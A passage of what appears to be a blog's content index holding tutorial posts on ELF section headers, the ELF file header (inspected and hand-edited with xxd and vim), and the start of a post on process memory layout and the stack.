Name: .gnu.version Type: 0xffff Flags: 0x2 Addr: 0x518 Offset: 0x518 Size: 14 Link: 6 Info: 0x0 Addralign: 0x2 Entsize: 2 [ 09 ] Section Name: .gnu.version_r Type: 0xfffe Flags: 0x2 Addr: 0x528 Offset: 0x528 Size: 48 Link: 7 Info: 0x1 Addralign: 0x8 Entsize: 0 [ 10 ] Section Name: .rela.dyn Type: 0x4 Flags: 0x2 Addr: 0x558 Offset: 0x558 Size: 192 Link: 6 Info: 0x0 Addralign: 0x8 Entsize: 24 [ 11 ] Section Name: .rela.plt Type: 0x4 Flags: 0x42 Addr: 0x618 Offset: 0x618 Size: 24 Link: 6 Info: 0x17 Addralign: 0x8 Entsize: 24 [ 12 ] Section Name: .init Type: 0x1 Flags: 0x6 Addr: 0x1000 Offset: 0x1000 Size: 27 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 13 ] Section Name: .plt Type: 0x1 Flags: 0x6 Addr: 0x1020 Offset: 0x1020 Size: 32 Link: 0 Info: 0x0 Addralign: 0x10 Entsize: 16 [ 14 ] Section Name: .text Type: 0x1 Flags: 0x6 Addr: 0x1040 Offset: 0x1040 Size: 315 Link: 0 Info: 0x0 Addralign: 0x10 Entsize: 0 [ 15 ] Section Name: .fini Type: 0x1 Flags: 0x6 Addr: 0x117c Offset: 0x117c Size: 13 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 16 ] Section Name: .rodata Type: 0x1 Flags: 0x2 Addr: 0x2000 Offset: 0x2000 Size: 18 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 17 ] Section Name: .eh_frame_hdr Type: 0x1 Flags: 0x2 Addr: 0x2014 Offset: 0x2014 Size: 36 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 18 ] Section Name: .eh_frame Type: 0x1 Flags: 0x2 Addr: 0x2038 Offset: 0x2038 Size: 124 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 19 ] Section Name: .init_array Type: 0xe Flags: 0x3 Addr: 0x3dd0 Offset: 0x2dd0 Size: 8 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 20 ] Section Name: .fini_array Type: 0xf Flags: 0x3 Addr: 0x3dd8 Offset: 0x2dd8 Size: 8 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 21 ] Section Name: .dynamic Type: 0x6 Flags: 0x3 Addr: 0x3de0 Offset: 0x2de0 Size: 480 Link: 7 Info: 0x0 Addralign: 0x8 Entsize: 16 [ 22 ] Section Name: .got Type: 0x1 Flags: 0x3 Addr: 0x3fc0 Offset: 0x2fc0 Size: 40 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 23 ] Section Name: .got.plt Type: 0x1 Flags: 0x3 Addr: 0x3fe8 Offset: 0x2fe8 Size: 32 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 24 ] Section Name: .data Type: 0x1 Flags: 0x3 Addr: 0x4008 Offset: 0x3008 Size: 16 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 25 ] Section Name: .bss Type: 0x8 Flags: 0x3 Addr: 0x4018 Offset: 0x3018 Size: 8 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 26 ] Section Name: .comment Type: 0x1 Flags: 0x30 Addr: 0x0 Offset: 0x3018 Size: 27 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 1 [ 27 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x3038 Size: 576 Link: 28 Info: 0x6 Addralign: 0x8 Entsize: 24 [ 28 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x3278 Size: 298 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 29 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x33a2 Size: 278 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 Here\u0026rsquo;s a sneak peek at what my trusty parser churned out, for your reference. (If you fancy, you can even pit it against the xxd results we saw earlier).\nNow, it\u0026rsquo;s time to take a deep dive into the inner workings of the Elf64_Shdr struct\n1. sh_name As I mentioned earlier, among so many sections of an ELF file, there\u0026rsquo;s one special place known as the string table. In this mystical realm, the names of all sections are held in a null-terminated fashion, creating a seamless string of section names. Now, the sh_name member, well, it\u0026rsquo;s like a treasure map, pinpointing the exact offset within that section. So, if, for instance, .interp resides at X1 bytes within the section, and this section itself is tucked away at Y1 bytes into the file, the location of this string can be calculated as simply X1 + Y1 bytes into the file. But, for the sake of simplicity, sh_name keeps things straightforward by storing just the X1 value, and nothing more. To track down the section\u0026rsquo;s exact location, we can rely on the trusty e_shstrndx value from the ELF file header.\nFrom programming point of view, accessing the string value for section name will look something like -\n(char*)(shdr[ehdr-\u0026gt;e_shstrndx].sh_offset + shdr[i].sh_name) 2. sh_type This section serves as a delightful teaser, offering a glimpse of the treasures awaiting inside the section itself. Take, for instance, SHT_STRTAB (0x3), a section that houses a collection of null-terminated strings, just waiting to be discovered.\nWhen we journey into the Linux kernel, we encounter a bunch of defined section header types -\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L271 */ /* sh_type */ #define SHT_NULL 0 #define SHT_PROGBITS 1 #define SHT_SYMTAB 2 #define SHT_STRTAB 3 #define SHT_RELA 4 #define SHT_HASH 5 #define SHT_DYNAMIC 6 #define SHT_NOTE 7 #define SHT_NOBITS 8 #define SHT_REL 9 #define SHT_SHLIB 10 #define SHT_DYNSYM 11 #define SHT_NUM 12 #define SHT_LOPROC 0x70000000 #define SHT_HIPROC 0x7fffffff #define SHT_LOUSER 0x80000000 #define SHT_HIUSER 0xffffffff 3. sh_flags This is a one-bit flag, that decides whether a specific feature applies to the given section or not\u0026hellip; Linux kernel has some flag types defined -\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L290 */ /* sh_flags */ #define SHF_WRIT 0x1 #define SHF_ALLOC 0x2 #define SHF_EXECINSTR 0x4 #define SHF_RELA_LIVEPATCH 0x00100000 #define SHF_RO_AFTER_INIT 0x00200000 #define SHF_MASKPROC 0xf0000000 Playing the guessing game? Well, if you spot a section like .text with a type value of 0x6, it\u0026rsquo;s a hint at what\u0026rsquo;s to come. This section will be allocated a space in memory at runtime, with permission to execute instructions, but don\u0026rsquo;t even think about writing anything to it after the section is loaded.\n4. sh_addr Now, if the section is destined for memory, this member plays a pivotal role, holding the keys to the memory kingdom, designating the precise spot where the section lands. But here\u0026rsquo;s a twist – for sections with no memory aspirations, this value becomes a mere placeholder, leaving a little room for some extra, secret bytes. (wink, wink)\n5. sh_offset Here\u0026rsquo;s the catch: while sh_addr spills the beans on the section\u0026rsquo;s memory location, this member focuses on the section\u0026rsquo;s spot in the file. It\u0026rsquo;s like knowing where the script lies before the performance. However, some sections, like the enigmatic SHT_NOBITS, are a bit of a puzzle – they claim a spot in the file, but when you try to read data from their supposed location, it\u0026rsquo;s like chasing a ghost; there\u0026rsquo;s nothing substantial to be found. (that is, they don\u0026rsquo;t take any space in file; like a classic \u0026ldquo;all bark, no bite\u0026rdquo; scenario)\n(HINT: Look at offsets and size of .bss and .comment sections from above listing. .bss is a SHT_NOBITS kind of section.)\n6. sh_size For sections that aren\u0026rsquo;t the enigmatic SHT_NOBITS type, this value is a trustworthy measure, mapping out the precise size (in bytes) of the section within the file. For SHT_NOBITS, it\u0026rsquo;s a bit of a riddle. While it claims to reveal a section\u0026rsquo;s size in bytes, be warned that when you glance at the size of a .bss section and it does says 8 bytes. But again, since there is nothing in the file, it\u0026rsquo;s more of a conceptual size for this type.\n7. sh_link This member is used to link a section with another section. One of the use for such kind of linking is to signify some sort of dependency of one section on another. But the actual nature of linking depends on the section type.\n(HINT: Checkout .gnu_hash, .dynsym, and dynstr sections)\n8. sh_info Think of this member as the mysterious vault, holding extra information that\u0026rsquo;s tailor-made for the section\u0026rsquo;s needs. However, the contents of this vault are shapeshifters, and what you\u0026rsquo;ll find inside depends entirely on the section\u0026rsquo;s unique personality and type.\n9. sh_addralign This member holds the alignment information. When it takes on the humble value of 0 or 1, it\u0026rsquo;s like saying, \u0026ldquo;No alignment required.\u0026rdquo; But when it strides into the realm of positive powers of 2, it becomes the architect of alignment, ensuring that the section is perfectly orchestrated for maximum efficiency.\nAlignment is the unsung hero in the world of efficient computing. It\u0026rsquo;s the magic behind how smoothly a computer can access and manipulate data or instructions.\n10. sh_entsize Picture it: there are sections that harbor orderly tables with entries of a fixed size. Now, this member is your trusted guide, revealing the size of each entry in bytes. To find the grand total of entries, you simply divide the section\u0026rsquo;s size by the size of each entry, just like a mathematical maestro.\n(NOTE: You can read more about ELF sections and each member of section headers from man 5 elf; RTFM)\nPracticals For now, let\u0026rsquo;s just start with what does strip command do to ELF sections. And research on why section headers are actually important.\nIf you are more inclined towards being tech savvy, try to write a program to parse and display the section headers.\nTo go an extra mile, add a new section to your ELF file (also add it\u0026rsquo;s entry in section headers)\u0026hellip;\nHere are some links that might give you a starting point.\nhttps://stackoverflow.com/questions/1088128/adding-section-to-elf-file https://reverseengineering.stackexchange.com/questions/14779/how-to-successfully-add-a-code-section-to-an-executable-file-in-linux https://stackoverflow.com/questions/29058016/efficiently-adding-a-new-section-in-an-elf-file Conclusion Alright, buckle up, because we\u0026rsquo;ve just taken a deep dive into the wild world of ELF section headers! Picture this -\n┌───────────────────────────┐ │ │ │ File Header │ │ │ │ │ ├───────────────────────────┤ │ │ │ Program Header │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section 1 │ │ │ ├───────────────────────────┤ │ Section 2 │ ├───────────────────────────┤ │ │ │ Section 3 │ ├───────────────────────────┤ │ │ │ │ │ │ │ │ │ │ │ Section 4 │ │ │ │ │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section 5 │ │ │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section 6 │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section Header │ │ │ │ │ └───────────────────────────┘ Think of sections as pieces of a puzzle, each unique in size and placed at different offsets within the file. But fear not, for the section headers play the role of meticulous architects, documenting these diverse sections\u0026rsquo; whereabouts and characteristics. They\u0026rsquo;re the cool blueprints that grant us insight into the entire file\u0026rsquo;s layout and functionality.\n","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-section-headers/","summary":"Intro Assuming you\u0026rsquo;ve got ELF headers like Elf64_Ehdr or Elf32_Ehdr at your fingertips, and you\u0026rsquo;re armed with the know-how and tools to decipher their contents effortlessly.\nFor this article I\u0026rsquo;ll be using the below C code to generate the ELF file.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } You can get the ELF binary by compiling this code.","title":"ELF Chronicles: Section Headers (2/?)"},{"content":"Hexdumps In the fascinating world of computers, we\u0026rsquo;re stuck conversing in binary, a rather dull language of just ones and zeros. But because we mere humans love things to be a tad more exciting and concise, we\u0026rsquo;ve come up with our own nifty number system - \u0026ldquo;hexadecimal\u0026rdquo; or \u0026ldquo;hex\u0026rdquo; for short. This system ditches the binary bore and adds a touch of flair with 16 snazzy symbols. It\u0026rsquo;s got your usual digits from 0 to 9, plus those fancy A to F letters to make data a bit more, well, hexadecimal-chic!\nNow, let\u0026rsquo;s take a gander at this binary enigma, a message that only the most extraordinary folks can decipher with ease:\n011010000110010101101100011011000110111100001010 For us ordinary humans, this is a bit like deciphering alien hieroglyphics. So, we follow a procedure to unravel the secrets hidden within.\nStep one involves breaking down the binary data into byte-sized chunks, each containing 8 bits:\n01101000 01100101 01101100 01101100 01101111 00001010 Now, we embark on the magical journey of converting each chunk into its hexadecimal form. The legendary figures of the past might have used pen and paper, but in our tech-savvy era, we turn to tools like CyberChef.\nNo matter your chosen method, the results remains the same:\n68 65 6c 6c 6f 0a The binary code\u0026rsquo;s cryptic riddle got a facelift, and voilà! We now have this friendly hexadecimal version. It\u0026rsquo;s just what the doctor ordered for us humans to have a casual chat with the binary data, no sweat!\nFrom Code to Binary Lets\u0026rsquo;s go on a journey that turns elegant C code into a mysterious binary blob, a language of ones and zeros that only computers understand. (** coughs compilation **)\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } After compiling the above C code we get an ELF (Executable and Linkable Format) file. (Compilation command - gcc hello_world.c -o hello_world)\nThis generated file, at its core, is nothing more than a delightful binary blob. It\u0026rsquo;s the computer\u0026rsquo;s secret handshake, speaking directly in ones and zeros, no pleasantries. And the icing on the cake is that we mere humans, with our clever programming prowess, can craft tools to translate this binary jargon into friendly hexadecimal, or we can simply cozy up to good ol\u0026rsquo; hexdump and xxd for the job. Whichever suits your fancy, we\u0026rsquo;ve got options!\nELF Header Here\u0026rsquo;s a snapshot of the first 64 bytes in the compiled binary file:\n# In binary representation ❯ xxd -b -l 64 ./hello_world 00000000: 01111111 01000101 01001100 01000110 00000010 00000001 .ELF.. 00000006: 00000001 00000000 00000000 00000000 00000000 00000000 ...... 0000000c: 00000000 00000000 00000000 00000000 00000011 00000000 ...... 00000012: 00111110 00000000 00000001 00000000 00000000 00000000 \u0026gt;..... 00000018: 01010000 00010000 00000000 00000000 00000000 00000000 P..... 0000001e: 00000000 00000000 01000000 00000000 00000000 00000000 ..@... 00000024: 00000000 00000000 00000000 00000000 00101000 00110101 ....(5 0000002a: 00000000 00000000 00000000 00000000 00000000 00000000 ...... 00000030: 00000000 00000000 00000000 00000000 01000000 00000000 ....@. 00000036: 00111000 00000000 00001101 00000000 01000000 00000000 8...@. 0000003c: 00011110 00000000 00011101 00000000 .... # In hex representation ❯ xxd -l 64 ./hello_world 00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ 00000010: 0300 3e00 0100 0000 5010 0000 0000 0000 ..\u0026gt;.....P....... 00000020: 4000 0000 0000 0000 2835 0000 0000 0000 @.......(5...... 00000030: 0000 0000 4000 3800 0d00 4000 1e00 1d00 ....@.8...@..... Now, you may wonder, what on earth does this mean? Well, these intriguing bytes are like puzzle pieces, and depending on the machine type, they map to specific structures in the Linux kernel. Our quest, quite simply, is to unravel this digital enigma and shed light on the code\u0026rsquo;s purpose.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L207 */ #define EI_NIDENT\t16 typedef struct elf32_hdr { unsigned char\te_ident[EI_NIDENT]; Elf32_Half\te_type; Elf32_Half\te_machine; Elf32_Word\te_version; Elf32_Addr\te_entry; /* Entry point */ Elf32_Off\te_phoff; Elf32_Off\te_shoff; Elf32_Word\te_flags; Elf32_Half\te_ehsize; Elf32_Half\te_phentsize; Elf32_Half\te_phnum; Elf32_Half\te_shentsize; Elf32_Half\te_shnum; Elf32_Half\te_shstrndx; } Elf32_Ehdr; typedef struct elf64_hdr { unsigned char\te_ident[EI_NIDENT];\t/* ELF \u0026#34;magic number\u0026#34; */ Elf64_Half e_type; Elf64_Half e_machine; Elf64_Word e_version; Elf64_Addr e_entry;\t/* Entry point virtual address */ Elf64_Off e_phoff;\t/* Program header table file offset */ Elf64_Off e_shoff;\t/* Section header table file offset */ Elf64_Word e_flags; Elf64_Half e_ehsize; Elf64_Half e_phentsize; Elf64_Half e_phnum; Elf64_Half e_shentsize; Elf64_Half e_shnum; Elf64_Half e_shstrndx; } Elf64_Ehdr; Since I\u0026rsquo;m on a 64 bit system, I\u0026rsquo;ll use Elf64_Ehdr to show what each byte in the above data chunk represents.\n❯ xxd -l 64 ./hello_world 00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ 00000010: 0300 3e00 0100 0000 5010 0000 0000 0000 ..\u0026gt;.....P....... 00000020: 4000 0000 0000 0000 2835 0000 0000 0000 @.......(5...... 00000030: 0000 0000 4000 3800 0d00 4000 1e00 1d00 ....@.8...@..... // After mapping the linux ELF struct to the above data e_ident[16] = 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 e_type = 03 00 e_machine = 3e 00 e_version = 01 00 00 00 e_entry = 50 10 00 00 00 00 00 00 e_phoff = 40 00 00 00 00 00 00 00 e_shoff = 28 35 00 00 00 00 00 00 e_flags = 00 00 00 00 e_ehsize = 40 00 e_phentsize = 38 00 e_phnum = 0d 00 e_shentsize = 40 00 e_shnum = 1e 00 e_shstrndx = 1d 00 Shall we dissect each of these mysterious members in the struct?\n1. e_ident[EI_NIDENT] The first 16 bytes of the ELF header are collectively referred to as the \u0026ldquo;ident\u0026rdquo; or \u0026ldquo;identification\u0026rdquo; field. It includes a magic number and various identification information. Here is a table that tells more about what all identification information is present in it.\ne_ident[16] = 7f45 4c46 0201 0100 0000 0000 0000 0000 EI_MAG0 = 7f EI_MAG1 = 45 (E) EI_MAG2 = 4c (L) EI_MAG3 = 46 (F) EI_CLASS = 02 EI_DATA = 01 EI_VERSION = 01 EI_OSABI = 00 EI_ABIVERSION = 00 EI_PAD = 00 0000 0000 0000 Ah, you might wonder, \u0026ldquo;How on earth do I know this?\u0026rdquo; Well, my friend, it\u0026rsquo;s a detective game we play, and our magnifying glass is the kernel source code.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L334 */ #define\tEI_MAG0\t0\t/* e_ident[] indexes */ #define\tEI_MAG1\t1 #define\tEI_MAG2\t2 #define\tEI_MAG3\t3 #define\tEI_CLASS\t4 /* 1=32Bit; 2=64Bit */ #define\tEI_DATA\t5 /* Endianness ==\u0026gt; 1=Little; 2=Big */ #define\tEI_VERSION\t6 /* ELF header version */ #define\tEI_OSABI\t7 /* OS ABI ==\u0026gt; 0=None(same as SysV); 3=Linux */ #define\tEI_PAD\t8 /* Starting of padding - currently unused */ ==\u0026gt; This information tells me that my ELF binary is a 64-Bit (EI_CLASS = 02), Little endian (EI_DATA = 01) binary.\n2. e_type This member tells what type of ELF file it is.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L69 */ #define ET_NONE 0 // No file type #define ET_REL 1 #define ET_EXEC 2 #define ET_DYN 3 #define ET_CORE 4 #define ET_LOPROC 0xff00 // Processor-specific #define ET_HIPROC 0xffff // Processor-specific Since my binary is little endian, e_type = 03 00 should be read as e_type = 00 03. That tells me that I\u0026rsquo;ve a ET_DYN type of file.\n3. e_machine This member tells us about the target architecture for the file. In linux kernel uapi, there is a complete header file dedicated for target machines.\nFor my binary file, machine type is 3e (e_machine = 3e 00; Should be read as 00 3e).\n(Integer representation of 3e is 62)\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf-em.h#L31 */ #define EM_X86_64\t62\t/* AMD x86-64 */ 4. e_version This member specifies the version of the ELF file. This is different from the EI_VERSION which tells only about the ELF header version.\nFor my binary file, version is 1 (remember, to convert the value to little endian)\nThese are the versions defined in linux kernel uapi header\n#define EV_NONE\t0\t/* e_version, EI_VERSION */ #define EV_CURRENT\t1 #define EV_NUM\t2 5. e_entry This member is quite interesting. This tells about the virtual/memory address where program execution begins. This is the starting point of the program.\nYou might think, \u0026ldquo;Aha, this must always point to the main() function!\u0026rdquo; Well, here\u0026rsquo;s a plot twist for you!\nFor my binary file, the entry point is 1050 (e_entry = 50 10 00 00 00 00 00 00).\nAccording to our trusty objdump, this value does not point to the main function but points to the _start function. (..which in turn executes the main function. Here is an article that explains this.)\n❯ objdump -D --disassembler-options=intel hello_world | grep -i \u0026#34;1050\u0026#34; 0000000000001050 \u0026lt;_start\u0026gt;: 6. e_phoff This is the program header offset. The starting point in the ELF file where program headers can be found.\n7. e_shoff Just like e_phoff, this member stores the offset of the section headers of the ELF file.\n8. e_flags This member provides processor-specific flags associated with the file.\n9. e_ehsize This member tells the size of the the ELF header. For my binary, value of this member is 40 (64 in decimal). Now you take a guess why I started analyzing first 64 bytes of the file.\n10. e_phentsize This is the size of each entry in program header.\n11. e_phnum This is the count of entries in program header\n12. e_shentsize This is the size of each entry in section header.\n13. e_shnum This is the count of entries in section header\n14. e_shstrndx Now, this little guy is what we call the \u0026ldquo;Section string index\u0026rdquo;. This points to the index in section headers which holds all of the strings.\n(We\u0026rsquo;ll talk more about section headers and program headers in later articles.)\nPracticals How to edit a binary file? If you think it through, you just need a program that can read/write binary data and convert that data to hex for us to view. You can build your own tool to do this or you can use other tools that can already do this.\nI would like to propose my favorite - vim + xxd\nHere are the steps to it.\nOpen the file in vim in binary mode (use -b flag) vim -b argv_printer Pass the data to xxd (you can also use the additional flags that xxd supports) Press : to go into commmand mode then type %!xxd -c 1 to pass the binary data through this command. :%!xxd -c 1 Edit the hex values you want (just like you would edit any other text file, press i and go on) Reverse the hex to binary Go to command mode again by pressing : then type %!xxd -r :%!xxd -r Now save and quit the vim editor If you don\u0026rsquo;t know steps for that consider learning vim first or, use another hex editor Change the ELF magic number Open the file with vim and edit the EI_MAG part. # Before 00000000: 7f . 00000001: 45 E 00000002: 4c L 00000003: 46 F # After 00000000: 7f . 00000001: 48 E 00000002: 45 L 00000003: 58 F Note that I\u0026rsquo;ve only changed the hex values and not the ascii values for it.\nrevert the hex to binary data (:%!xxd -r) write and quit vim (I\u0026rsquo;m still not telling you the command) analyze it ❯ ./hello_world zsh: exec format error: ./hello_world ❯ readelf --file-header --wide hello_world readelf: Error: Not an ELF file - it has the wrong magic bytes at the start The reason for this behaviour is written in kernel code.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L348 */ #define\tELFMAG\t\u0026#34;\\177ELF\u0026#34; #define\tSELFMAG\t4 /* https://elixir.bootlin.com/linux/v6.5.7/source/fs/binfmt_elf.c#L848 */ retval = -ENOEXEC; if (memcmp(elf_ex-\u0026gt;e_ident, ELFMAG, SELFMAG) != 0) goto out; Change the executable class (64 bit -\u0026gt; 32 bit) Open the file with vim and edit the EI_CLASS part. # Before 00000004: 02 . # After 00000004: 01 . revert the hex to binary data (:%!xxd -r) write and quit vim (I\u0026rsquo;m still not telling you the command) analyze it # Runs perfectly fine ❯ ./hello_world Hello World1 Hello World2 Hello World3 # file command tells another tale ❯ file hello_world hello_world: ELF 32-bit LSB pie executable, x86-64, version 1 (SYSV), no program header, no section header This is clearly a parsing problem. There are no checks on the kernel for the EI_CLASS (or I should say I could not find any, if you find one, please let me know.)\n\u0026hellip;more (DIY, kind of) There are few more interesting things you can play around with\nEI_OSABI e_machine e_entry Conclusion ELF headers emerge as the silent orchestrators of the executable files\u0026hellip; The backstage bosses of the show. In this article, we cracked open their secrets (with not-so-real-world tricks) and diving into their nitty-gritty using hexdumps. Think of this as the cool architect of the software world, shaping how things work under the hood.\nMastering these headers is like getting a backstage pass to rock the binary world - tweaking, fixing, and making stuff dance to your tune. So next time you run an executable on *unix machines, remember, ELF header are the groove makers behind the scenes!\nUseful links (ELF Specification 1.1) https://flint.cs.yale.edu/cs422/doc/ELF_Format.pdf ","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-elf-header/","summary":"Hexdumps In the fascinating world of computers, we\u0026rsquo;re stuck conversing in binary, a rather dull language of just ones and zeros. But because we mere humans love things to be a tad more exciting and concise, we\u0026rsquo;ve come up with our own nifty number system - \u0026ldquo;hexadecimal\u0026rdquo; or \u0026ldquo;hex\u0026rdquo; for short. This system ditches the binary bore and adds a touch of flair with 16 snazzy symbols. It\u0026rsquo;s got your usual digits from 0 to 9, plus those fancy A to F letters to make data a bit more, well, hexadecimal-chic!","title":"ELF Chronicles: ELF file Header (1/?)"},{"content":"When an operating system (OS) runs a program, the program is first loaded into main memory. Memory is utilized for both program\u0026rsquo;s machine instructions and program\u0026rsquo;s data\u0026hellip;this includes parameters, dynamic variables, (un)initialized variables, and so on.\nMost computers today use paged memory allocations, which allow the amount of memory assigned to a program to increase/decrease as the needs of the application change. Memory is allocated to the program and reclaimed by the operating system in fixed-size chunks known as pages. When a program is loaded into a paged-memory computer, the operating system initially allocates a small number of pages to the program and then allocates additional memory as needed.\nOn a linux machine you can check the memory layout of a running program using cat /proc/\u0026lt;proc_id\u0026gt;/map.\n\u0026gt; cat /proc/self/maps 55f5db535000-55f5db537000 r--p 00000000 08:02 917947 /usr/bin/cat 55f5db537000-55f5db53b000 r-xp 00002000 08:02 917947 /usr/bin/cat 55f5db53b000-55f5db53d000 r--p 00006000 08:02 917947 /usr/bin/cat 55f5db53d000-55f5db53e000 r--p 00007000 08:02 917947 /usr/bin/cat 55f5db53e000-55f5db53f000 rw-p 00008000 08:02 917947 /usr/bin/cat 55f5dd440000-55f5dd461000 rw-p 00000000 00:00 0 [heap] 7f0db2800000-7f0db2aea000 r--p 00000000 08:02 929341 /usr/lib/locale/locale-archive 7f0db2ba4000-7f0db2bc9000 rw-p 00000000 00:00 0 7f0db2bc9000-7f0db2beb000 r--p 00000000 08:02 923932 /usr/lib/libc.so.6 7f0db2beb000-7f0db2d45000 r-xp 00022000 08:02 923932 /usr/lib/libc.so.6 7f0db2d45000-7f0db2d9d000 r--p 0017c000 08:02 923932 /usr/lib/libc.so.6 7f0db2d9d000-7f0db2da1000 r--p 001d4000 08:02 923932 /usr/lib/libc.so.6 7f0db2da1000-7f0db2da3000 rw-p 001d8000 08:02 923932 /usr/lib/libc.so.6 7f0db2da3000-7f0db2db2000 rw-p 00000000 00:00 0 7f0db2dd0000-7f0db2dd1000 r--p 00000000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7f0db2dd1000-7f0db2df7000 r-xp 00001000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7f0db2df7000-7f0db2e01000 r--p 00027000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7f0db2e01000-7f0db2e03000 r--p 00031000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7f0db2e03000-7f0db2e05000 rw-p 00033000 08:02 923793 /usr/lib/ld-linux-x86-64.so.2 7ffd55089000-7ffd550aa000 rw-p 00000000 00:00 0 [stack] 7ffd550f6000-7ffd550fa000 r--p 00000000 00:00 0 [vvar] 7ffd550fa000-7ffd550fc000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall] When you read the contents of /proc/self/map, you will encounter multiple lines, with each line representing a separate memory mapping region. Each line contains various fields separated by whitespace, representing different attributes of the memory mapping. The common fields include:\nStart and End Addresses: The starting and ending virtual addresses of the memory mapping region. Permissions: The permissions assigned to the memory mapping, such as read, write, and execute. Offset: The offset in the file (if the mapping is backed by a file) or zero otherwise. Device and Inode: The device and inode number of the file backing the mapping. File descriptor: If the mapping is associated with a file opened by the process, the file descriptor number is mentioned in this field. Flags: Additional flags indicating special characteristics of the mapping. Inode and Path: The inode number and path of the file backing the mapping (if available). Memory layout of a process Memory space allocated to a running program/process is called process memory (AKA virtual memory). It allows multiple programs to run concurrently and provides each program with a dedicated and isolated memory space. The purpose of process memory is to facilitate the execution of programs by providing a private address space for each process, shielding them from interfering with one another.\nA typical memory layout consists of many segments.\nText segment (code segment) Initialized data segment (data segment) Uninitialized data segment (bss segment) Heap Stack Text segment (Code Segment) The code segment contains the executable instructions of the program. It is typically read-only and stores the program\u0026rsquo;s machine code instructions, constants, and literals.\nInitialized data segment (Data Segment) This segment contains initialized static variables like global variables and local static variables which have a defined value and can be modified.\nUninitialized data segment (BSS Segment) This segment contains uninitialized static data, both variables and constants. On most systems, kernel automatically zeros this segment.\nHeap This segment contains dynamically allocated memory. It is usually managed by malloc, calloc, realloc, free (and their sibling functions too). The heap segment is shared by all threads, shared libraries, and dynamically loaded modules in a process. Heap memory segment grows towards higher memory addresses.\nStack This region of memory is used for managing function calls and local variables. It is an essential part of the execution environment and plays a crucial role in program flow control.\nThis is typically located in higher parts of the memory and grows towards lower parts (towards heap memory). A stack pointer register keeps track of the top of the stack, this gets adjusted each time a new value is pushed to or poped from the stack.\nThis is what the whole memory layout looks like altogether, but in this article we are focusing mainly on stack segment.\nMore about stack (practical) Stack memory is organized into stack frames, each representing the activation record of a function call. A stack frame contains information such as function parameters, local variables, return addresses, and other metadata necessary for function execution.\nLet\u0026rsquo;s start with a simple example of function calls to understand how stack works.\n#include\u0026lt;stdio.h\u0026gt; // Prints are garbage value from stack and returns the same. int func2() { int var2; printf(\u0026#34;var2 (%p) = %d\\n\u0026#34;, \u0026amp;var2, var2); return var2; } // Prints var1 value as 55 and returns it. int func1() { int var1 = 55; printf(\u0026#34;var1 (%p) = %d\\n\u0026#34;, \u0026amp;var1, var1); return var1; } // Main function int main() { // Calls both functions and stores their return values int v1 = func1(); int v2 = func2(); // Compares their return values and print message if(v1 == v2) printf(\u0026#34;Both values are equal\\n\u0026#34;); else printf(\u0026#34;Both values are not equal\\n\u0026#34;); return 10; } To get a better understanding for this, I\u0026rsquo;ll put this down in steps of what this program will do upon execution.\nCall func1(), get a return value and store that in v1 variable. Call func2(), get a return value and store that in v2 variable Compare both values and print appropriate message. That\u0026rsquo;s it. Quite straightforward, 